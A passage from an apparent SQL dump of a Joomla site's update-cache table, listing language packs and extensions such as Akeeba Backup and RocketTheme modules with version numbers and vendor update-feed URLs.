Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18001,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18002,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18003,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18004,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18005,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18006,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18007,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18008,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18009,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18010,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18011,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18012,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18013,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18014,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(18015,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(18016,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-1.html',''),(18017,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18018,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18019,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18020,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(18021,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18022,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18023,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18024,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18025,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18026,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18027,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18028,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18029,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18030,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18031,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18032,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18033,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18034,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18035,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18036,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18037,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18038,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18039,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18040,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18041,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18042,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18043,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18044,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18045,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18046,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18047,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18048,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18049,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18050,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18051,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18052,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18053,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18054,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18055,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18056,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18057,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18058,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18059,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18060,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18061,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18062,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18063,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18064,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18065,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18066,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18067,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18068,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18069,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18070,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18071,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18072,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18073,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18074,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(18075,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(18076,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(18077,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(18078,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(18079,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(18080,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(18081,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(18082,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(18083,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18084,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18085,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18086,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18087,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18088,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18089,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18090,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18091,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18092,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18093,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18094,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18095,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18096,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18097,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18098,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18099,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18100,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18101,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18102,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18103,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18104,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18105,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18106,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18107,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18108,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18109,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18110,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18111,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18112,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18113,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18114,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18115,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18116,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18117,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18118,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18119,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18120,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18121,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18122,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18123,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18124,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18125,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18126,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18127,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18128,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18129,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18130,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18131,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18132,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18133,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(18134,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(18135,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(18137,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18138,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18139,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18140,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18141,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18142,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18143,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18144,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18145,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18146,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18147,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18148,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18149,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18150,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18151,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18152,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18153,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18154,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18155,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18156,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18157,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18158,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18159,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18160,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18161,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18162,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18163,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18164,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18165,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18166,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18167,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18168,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18169,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18170,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18171,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18172,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18173,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18174,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18175,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18176,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18177,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18178,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18179,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18180,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18181,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18182,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18183,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18184,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18185,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18186,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18187,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18188,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18189,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18190,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(18191,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(18192,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(18193,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(18194,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(18195,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(18196,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(18197,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(18198,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(18199,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18200,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18201,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18202,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18203,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18204,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18205,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18206,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18207,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18208,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18209,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18210,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18211,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18212,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18213,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18214,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18215,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18216,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18217,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.